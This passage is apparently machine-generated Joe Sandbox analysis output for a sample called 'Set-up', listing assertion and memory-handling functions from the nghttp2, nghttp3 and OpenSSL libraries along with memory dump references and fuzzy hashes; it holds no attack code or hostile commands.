                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _assert
                          • String ID: nghttp3_buf_left(dbuf) >= nghttp3_buf_len(&decoder->dbuf) + len$nghttp3_qpack.c
                          • API String ID: 1222420520-645767172
                          • Opcode ID: 6d28efcef2923c457b2b239a1731a16eef19ab031a6235ca806f46ef83b0a4a0
                          • Instruction ID: 9fd50ad4b36460416892c0247183aceb02a17c7c10a2b9cf026b8329dfd0db81
                          • Opcode Fuzzy Hash: 6d28efcef2923c457b2b239a1731a16eef19ab031a6235ca806f46ef83b0a4a0
                          • Instruction Fuzzy Hash: FA51E875A083048FD714AF28D884B6AB7D6FF98314F09867DEC989B392EA34DD058B51
                          APIs
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(0 == rv,nghttp2_map.c,000000CF), ref: 000BC50A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _assert
                          • String ID: 0 == rv$nghttp2_map.c
                          • API String ID: 1222420520-2488825769
                          • Opcode ID: c97d25a203c0ef042b0b87fabbc4e0a341e8906eda22a87770b6ba43312bf1af
                          • Instruction ID: 3fecbeb2c00df1892be9670e240dcd5d15577fb2746a80650c987f1e2bd4b5ea
                          • Opcode Fuzzy Hash: c97d25a203c0ef042b0b87fabbc4e0a341e8906eda22a87770b6ba43312bf1af
                          • Instruction Fuzzy Hash: DA5103756087069FD310CF19C880A6AFBE5FF88754F058A2EE998A7310E730E955CF92
                          APIs
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(data,nghttp2_map.c,000000DD), ref: 000BC394
                            • Part of subcall function 000BC3A0: _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(0 == rv,nghttp2_map.c,000000CF), ref: 000BC50A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _assert
                          • String ID: data$nghttp2_map.c
                          • API String ID: 1222420520-1279632610
                          • Opcode ID: c8e6a74eefd574c3757cb7d13acfc278eb1fe7dd45b6e810e73f951ca8639c22
                          • Instruction ID: 72efa3121928fc0e952cf818712e563f697d0ac35641f4cc9b426f0018b9ac01
                          • Opcode Fuzzy Hash: c8e6a74eefd574c3757cb7d13acfc278eb1fe7dd45b6e810e73f951ca8639c22
                          • Instruction Fuzzy Hash: AE4148B5A087069FD754CF19D480A6AB7E1FF88700F54C92DE99AC7351E730E915CB82
                          APIs
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E,?,?,?,?,?,?,?), ref: 000C468C
                          Strings
                          • tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS, xrefs: 000C4687
                          • nghttp3_conn.c, xrefs: 000C4682
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _assert
                          • String ID: nghttp3_conn.c$tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS
                          • API String ID: 1222420520-4133914617
                          • Opcode ID: 90cd8dbb2ed7bd928e33b87b332af34faf7396c60e4c81c7962ffe09dfb2f28d
                          • Instruction ID: cedde248ec4f0b057b43c72eca1d16ef6a3d9930457b3a0f7390e1896b8556cd
                          • Opcode Fuzzy Hash: 90cd8dbb2ed7bd928e33b87b332af34faf7396c60e4c81c7962ffe09dfb2f28d
                          • Instruction Fuzzy Hash: A231C5716006016BD6109B24EC85FAF77E8FF86369F04062DF95887282E731E814C7B2
                          APIs
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS,nghttp3_conn.c,0000060E), ref: 000C44B7
                          Strings
                          • tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS, xrefs: 000C44B2
                          • nghttp3_conn.c, xrefs: 000C44AD
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _assert
                          • String ID: nghttp3_conn.c$tnode->pri.urgency < NGHTTP3_URGENCY_LEVELS
                          • API String ID: 1222420520-4133914617
                          • Opcode ID: 01f7bb082614916265ccd4305be684ca051fbbab2f5a3ad8c7a0db8c64840b8f
                          • Instruction ID: a85e3950be9e9154051fcd428fade0b89d3ead2090c97b7ad1c873cc09d96313
                          • Opcode Fuzzy Hash: 01f7bb082614916265ccd4305be684ca051fbbab2f5a3ad8c7a0db8c64840b8f
                          • Instruction Fuzzy Hash: 6B21CF76100601ABEB105B64DC45FAB77EAAF84365F08046CFA19C62A3FB36D4159761
                          APIs
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 0039A161
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 0039A2D1
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 0039A3EC
                          • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,?), ref: 0039A499
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID:
                          • API String ID: 3510742995-0
                          • Opcode ID: 5457c47c720ad006b8d265b13c42270cf219ec2930d8984f87fdb8b1f46f8f45
                          • Instruction ID: 11a47ca4c0924d4d3b5f723df4826ebe915e0c6c6881d2e41d5d1c3264d58cdc
                          • Opcode Fuzzy Hash: 5457c47c720ad006b8d265b13c42270cf219ec2930d8984f87fdb8b1f46f8f45
                          • Instruction Fuzzy Hash: D9C18A716046109FCF05DF2DC888A6A7BE5BF89314F1A4A6DE8498B356D771EC40CBC6
                          APIs
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(i < len || offset == 0,nghttp3_stream.c,00000371,00000000,0009D7A7,?,?,0009D7A7), ref: 000C61CF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _assert
                          • String ID: i < len || offset == 0$nghttp3_stream.c
                          • API String ID: 1222420520-1528673747
                          • Opcode ID: 9af97f980bab1d7541e4a606db13877f2eb19df5f72a76e77d2556b2e44d815f
                          • Instruction ID: d080281f847a4df2d8e14c3f9d6b824bd9f13271123b80821304e43fa7c13508
                          • Opcode Fuzzy Hash: 9af97f980bab1d7541e4a606db13877f2eb19df5f72a76e77d2556b2e44d815f
                          • Instruction Fuzzy Hash: B4116D755043148FD314EF68D888FAA77E5FB88321F0A44BDED49473A3EA316945CBA2
                          APIs
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((blklen & 0xfu) == 0,nghttp3_balloc.c,00000022,000C88D3,00000010,?,?,00000000,000C9AE3,000CACDD,-00000010,?,?,?,00000000,?), ref: 000C873C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _assert
                          • String ID: (blklen & 0xfu) == 0$nghttp3_balloc.c
                          • API String ID: 1222420520-1502420682
                          • Opcode ID: 2f90f28bee763813728dd9fdcf39e9f9efd7459006a2e3dbff90d766e63d2cd8
                          • Instruction ID: 215094da8ce3fd83943c465195b89779999ffdc7599b0d92dba48133748060f0
                          • Opcode Fuzzy Hash: 2f90f28bee763813728dd9fdcf39e9f9efd7459006a2e3dbff90d766e63d2cd8
                          • Instruction Fuzzy Hash: 4711A1756093405FC7129B24DC46F9ABFB1AF42704F1DC59DE848AB293E674EC04C755
                          APIs
                          • strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,\/@), ref: 0004C1E5
                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 0004C1F4
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: strlenstrpbrk
                          • String ID: \/@
                          • API String ID: 3089284949-4263999291
                          • Opcode ID: 1712ca4108cb59c586fb9b9fedf72e77001028de8af34d08468ad7e809c34a87
                          • Instruction ID: 669f894a7c79601c66b185e216d1b796c88244e4925e55b2d2000b87421b1678
                          • Opcode Fuzzy Hash: 1712ca4108cb59c586fb9b9fedf72e77001028de8af34d08468ad7e809c34a87
                          • Instruction Fuzzy Hash: 9CE0CDD3A0511115E7A221FDBC02FBE5794D7C2A61F1D0277F555D2204F6F489514292
                          APIs
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(rcbuf->ref > 0,nghttp2_rcbuf.c,00000058,000B5E1F,?), ref: 000BA5D6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _assert
                          • String ID: nghttp2_rcbuf.c$rcbuf->ref > 0
                          • API String ID: 1222420520-4045439697
                          • Opcode ID: 744349d5116730ce17e64129a1899504293b7c8399db92fe3d8535baf541a400
                          • Instruction ID: 465517bf1382670f43a5369c5c72721034acce4c2534ef55aa67fe506900b7fe
                          • Opcode Fuzzy Hash: 744349d5116730ce17e64129a1899504293b7c8399db92fe3d8535baf541a400
                          • Instruction Fuzzy Hash: 41F0A0343006009FCB688F04C905DA5BBA2FF86712B848188F909872E2C771DD02CA02
                          APIs
                          • _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(rcbuf->ref > 0,nghttp3_rcbuf.c,0000005E,000D0B2D,5308C483,00000000,000C4D9F,?,000C0EC8), ref: 000C0333
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: _assert
                          • String ID: nghttp3_rcbuf.c$rcbuf->ref > 0
                          • API String ID: 1222420520-1879435254
                          • Opcode ID: d712b8247abea8b7cc6352adab595b00832744ff10986aaf6553ff3aa39c41bc
                          • Instruction ID: 3442faa63c136448009d42f828a2803612544ce7a192c4b292b58f96a17850c8
                          • Opcode Fuzzy Hash: d712b8247abea8b7cc6352adab595b00832744ff10986aaf6553ff3aa39c41bc
                          • Instruction Fuzzy Hash: 35E0C034600644DFCA548B14D955F6D77E6BF49722F98C19CF419872E2D771DD02DA01
                          APIs
                            • Part of subcall function 001F9F60: GetStdHandle.KERNEL32(000000F4), ref: 001F9F76
                            • Part of subcall function 001F9F60: GetFileType.KERNEL32(00000000), ref: 001F9F83
                            • Part of subcall function 001F9F60: WriteFile.KERNEL32(00000000,?,00000200,?,00000000), ref: 001F9FBB
                          • raise.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000016,001FD8B6,assertion failed: WITHIN_ARENA(ptr),crypto/mem_sec.c,000002E8,00000000,00000020,001FDF70,?,?,?,?,?,?,?,00000000), ref: 001FA18B
                          • _exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000003,?,001FD8B6,assertion failed: WITHIN_ARENA(ptr),crypto/mem_sec.c,000002E8,00000000,00000020,001FDF70,?,?,?,?,?,?,?), ref: 001FA195
                          Strings
                          • %s:%d: OpenSSL internal error: %s, xrefs: 001FA17C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.000000000058E000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812763486.000000000058F000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812782570.0000000000591000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812804992.0000000000592000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812824949.0000000000597000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812845417.0000000000599000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812955607.00000000006F4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812993314.00000000006F5000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1813017934.00000000006F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_Set-up.jbxd
                          Similarity
                          • API ID: File$HandleTypeWrite_exitraise
                          • String ID: %s:%d: OpenSSL internal error: %s
                          • API String ID: 2477291680-569889646
                          • Opcode ID: cf8980cbc725da10f12758250ff13d875f822ec44964717a57a52badf2dea760
                          • Instruction ID: 3ef6aa463dc90403a9f2b1101284599147d4c56873ab6ad817dbcef62949c91f
                          • Opcode Fuzzy Hash: cf8980cbc725da10f12758250ff13d875f822ec44964717a57a52badf2dea760
                          • Instruction Fuzzy Hash: 63C012B2D85345BBEB037F904C03B3AF565AF66700F0C1C18B255241D2AA639534A657
                          APIs
                            • Part of subcall function 004FA680: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,004FA76D), ref: 004FA698
                            • Part of subcall function 004FA680: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,004FA76D), ref: 004FA6B4
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004FA7F5
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004FA7FD
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004FA816
                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004FA830
                          Memory Dump Source
                          • Source File: 00000000.00000002.1812365022.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1812341758.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1812712354.00000000004FF000.00000004.00000001.01000000.00000003.sdmpDownload File
